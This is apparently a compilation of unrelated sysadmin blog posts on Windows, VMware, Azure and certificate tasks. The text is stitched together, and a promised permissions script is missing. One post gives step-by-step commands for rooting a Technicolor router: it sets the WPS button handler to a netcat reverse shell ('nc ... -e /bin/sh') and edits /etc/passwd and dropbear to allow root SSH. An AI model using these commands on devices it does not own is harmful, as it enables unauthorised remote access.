Quick Script to Modify user home directory permissions
Home Drive Permissions
common user home folder location from dsa.msc
Migrating user home drives can be a pain if permissions are not copied over at the same time. Permissions can also get messed up for other reasons like improper data restore or an admin clicking the wrong button.
Provided your home folder share is configured as \\server\share\%username% then this quick script can add the user with Full Control rights to their folder.
type exit to go back to the login screen, login with install no password, then follow the instructions
Troubleshooting
If the VM doesn’t boot and errors with dracut-initqueue timeout complaining it can’t find disk by UUID. Make sure your disks are all set to SATA on the bus
If the CVM won’t start after running install make sure you made the relevant VMware specific modifications.
If the installer won’t run complaining Intel VT-x is not running, make sure you have nested virt enabled on the vCPU - see fig 2.1. Also make sure you made the right changes to the minimum_reqs.py file.
Replace the MS Advanced Threat Analytics (ATA) Center Certificate
Foreword
This guide is based on the Microsoft Document but goes into a little more detail and should be clearer, you should review the Microsoft guide as well as this one. https://docs.microsoft.com/en-us/advanced-threat-analytics/modifying-ata-center-configuration THIS MUST BE DONE BEFORE CERTIFICATE EXPIRES!! I am purposely not using auto enrolment. This may generate a new thumbprint if the certificate auto renews, causing all the gateways to stop talking to the ATA Center server. This process must be done manually before the certificate expires each time! This guide assumes you have a PKI infrastructure in your domain. The certificate you generate must be trusted by the gateway for this to work otherwise the gateways will disconnect from the ATA Center.
In this guide, I will:
Add a second server certificate
Update all the gateways so they recognise the new certificate
Switch to the new certificate
Update all the gateways again so they only use the new certificate.
Replacing the certificate
Check the existing certificate in the management panel. Currently all the gateways only have this certificate pinned in their configuration and will only talk to the Center if it’s using this certificate.
Generating the New Certificate
Log into the ATA Center Server and open “Manage Computer Certificates”
Open Personal > Certificates
Right click in the right pane
Select All Tasks > Advanced Options > Create Custom Request.
Follow the enrolment wizard and select web server certificate template
On the Certificate Information screen, expand details and click properties
Fill out the form, include all the relevant details including alternative names
Deselect Microsoft DH Provider in the Private Key tab and change the Key size to 2048 bits
Save the CSR somewhere handy
Copy the CSR to your issuing CA
Run the following certreq command to generate the certificate
certreq -submit -config “SERVER1\ADCS Issuing CA-1” server1.csr server1.cer
Copy the resulting files back to the ATA Center server
Importing the Certificate
Open the certificate, note the thumbprint, then install the certificate into the local computer, Personal store
Replacing the Certificate in ATA Center
Log into ATA Center web console
Configuration > Center
Select the new certificate, check the thumbprint matches the newly installed cert
IMPORTANT STEP, DON’T CLICK ACTIVATE YET
Click Save and wait for all gateways to sync the config – do not click activate
Once you see the Green message that all gateways have synced the config click Activate and wait for all gateways to sync the config again.
You can now restart the ATA Center service in Windows
When you reload the page in a fresh browser, the certificate should now be the new trusted cert.
If you have a GPU or PCI device passed through to your virtual machine, you've likely seen the error message in VMware that you cannot expose VT-d to the VM at the same time: Failed to reconfigure virtual machine commando. PCI passthrough devices cannot be added when Nested Hardware-Assisted Virtualization is enabled.
If you need both PCI passthrough and VT-d (nested virtualisation) on the same VM in ESXi 6.7 u2, here's how: Back up, then edit your VMX file and include the following 2 lines: vhv.enable = "TRUE" vhv.allowPassthru = "TRUE"
Doing so will enable experimental support for both to be passed through to the VM. Unfortunately this causes some side effects. The vmmem process appears to be running wild and taking 25% CPU on this 4-core VM (so likely a full thread.)
Since this is unsupported, I guess this is just an issue you need to live with until there is a fix (if ever.) If you happen to know one weird trick (sysadmins HATE him) to fix this please leave a comment. For now, I'll just enable in the VM when I really need to have VT-d exposed.
Windows Server 2019 now comes with the ability to install various GUI binaries into a core install of windows. This feature is really useful, but if you are in an enterprise environment with WSUS you may have trouble installing. The error I was receiving when trying to install the pack: Add-WindowsCapability -Online -Name ServerCore.AppCompatibility~~~~0.0.1.0 Add-WindowsCapability failed. Error code = 0x8024500c
The resolution for me was to temporarily disable WSUS on the machine.
Problem: When trying to join vCenter to the Active Directory domain for Single Sign on, the following error is displayed: idm client exception: Error trying to join AD, error code [41887], user [username@domain], domain [domain.local], orgUnit []
Cause: Joining Active Directory fails in vCenter due to the user attempting to authenticate using a logon name that is not their user principal name (UPN.) Check the user's account object in Active Directory Users & Computers - user logon name - in Account tab. Solution: Use the user's UPN to authenticate to AD and the configuration should succeed.
Azure has a bunch of built in roles but sometimes you need someone or something to be able to do a single task and don’t want to over permission their account.
Azure RBAC allows you to define a custom role with really granular permissions. To do this you can use PowerShell to pull one of Azure’s pre-defined templates, modify it in a text editor using JSON, then push it back as a custom defined role to assign to your user.
My example will be to create a user role that’s able to read BGP status information from the subscription. Initially I created a user and gave it the ‘Reader’ role but I hit the following error.
Take a note of the permission (Action) required, as this will be used to create the new role definition.
Check the list of RBAC roles by attempting to add role to a user on a subscription, resource group or resource in the portal. You can also run the following PowerShell command to get a list of all the resources in your subscription.
Get-AzureRmRoleDefinition
Once you’ve selected a template that’s similar to what you want, then get the definition and view the current permissions. I’m just using the ‘Reader’ role as it’s really simple and I only need a couple of additional permissions.
Get-AzureRmRoleDefinition "Reader"
You can now export the definition to a JSON file for editing
Edit the file in a text editor. You need to remove the id tag and change IsCustom to true. Change the Name, Description and add in the Actions required.
And here is my custom file, note I have set this to be limited to a subscription. Also, I have modified the Action to include all actions for virtualNetworkGateways.
Once the role is removed you can recreate it with the above commands. There is also a Set-AzureAzureRmRoleDefinition but this may require modifying your JSON.
After finding that some of my domain controller VMs were set to sync with the host, I had a time synchronisation issue across my domiain. Here are a couple of commands that assisted in resolving the problem.
Here is a method for gaining root access to your Technicolor TG589vac (and probably other models of) router. Unfortunately this will only work on European models that have SSH enabled with an engineer account enabled.
Tested working on firmware revision 17.2.0278 It's a bit more involved than the older methods but here goes: First set up a machine listening with netcat (make a note of it's IP) nc -lvvp 4444 Set up the WPS button to connect back to your listening machine. Log into the engineer account using SSH. Password is printed on the label as access code. get uci.button.button.@wps.handler set uci.button.button.@wps.handler 'nc <IP ADDRESS> 4444 -e /bin/sh' get uci.button.button.@wps.handler
Push the WPS button on the router (on the 589 it's the one on the side, visible in the image up top) Congrats, you now have a root shell.
Once logged in you can set up root login via ssh. The following will read the passwd file, then modify the root shell from /bin/false to /bin/ash cat /etc/passwd sed -i "1s/\/bin\/false/\/bin\/ash/" /etc/passwd cat /etc/passwd Make sure the 2nd output of the passwd file has the correct root shell. Next, configure dropbear to allow root login via SSH uci set dropbear.lan.RootLogin='1' uci set dropbear.lan.RootPasswordAuth='on' uci commit You have to restart dropbear /etc/init.d/dropbear restart root password is root :) Login via SSH, set new root password root@dsldevice:~# passwd root New password: Retype password: Password for root changed by root Set WPS button back using UCI uci set button.wps.handler='wps_button_pressed.sh' uci commit
Some time ago, I played around with the on-premise Azure StorSimple virtual appliance. Unfortunately, I happened to pick the new blob storage account in cool, RA-GRS mode. This happened to have a very expensive "per 10k write" cost and cost quite a bit of money when I uploaded 750 GiB of data. Since then, we have seen Azure storage transaction costs come way down, especially on the v1 general purpose storage account type. To help you get an estimate of storage and transaction costs for uploading bulk data into a StorSimple device, I've created a calculator here. To begin, simply key in a GiB storage amount that you plan to upload, the per 10k write and per GB cost for your region and the calculator will give a guide to the expected transaction and storage cost to upload the data. The calculator does not calculate transactions for day to day access, nor does it include cloud snapshot transactions or storage. Be aware, the 512 KiB chunk size will reduce transaction costs, but will also significantly reduce deduplication. The Microsoft pricing page explains this. This, version 1 of the calculator requires you to key in the per 10k writes and per GB cost for your chosen region and storage account type. It defaults to v1, LRS, North Europe, GBP costs as of the time of writing. I've purposely left out the currency symbol as it should work with most currencies as-is. Hopefully with some additional time, I'll be able to add a pull-down box to choose storage account type and location and have it automatically enter those costs for you.
Due to Spectre and Meltdown patches causing problems with various anti virus vendors, Microsoft has added a registry key check for ALL patches on Windows Server for January and February 2018 (not just the Spectre and Meltdown patches) If you find yourself in the situation where your severs are not detecting the latest update rollups then check this Microsoft post: https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software Most AV vendors are properly setting this flag in the registry, but some will not and if you have some servers which do not have AV for legitimate reasons you may find yourself unable to patch these machines. The server will simply not show the update rollups from WSUS or Microsoft Update servers. In WSUS, they will show as 'not applicable' for the server. Setting the flag resolves the issue, but unless you are checking that servers are getting updated properly this may not be noticed. In WSUS, since the updates are not applicable, the server will show as fully patched, not requiring the updates which is a bad situation to be in.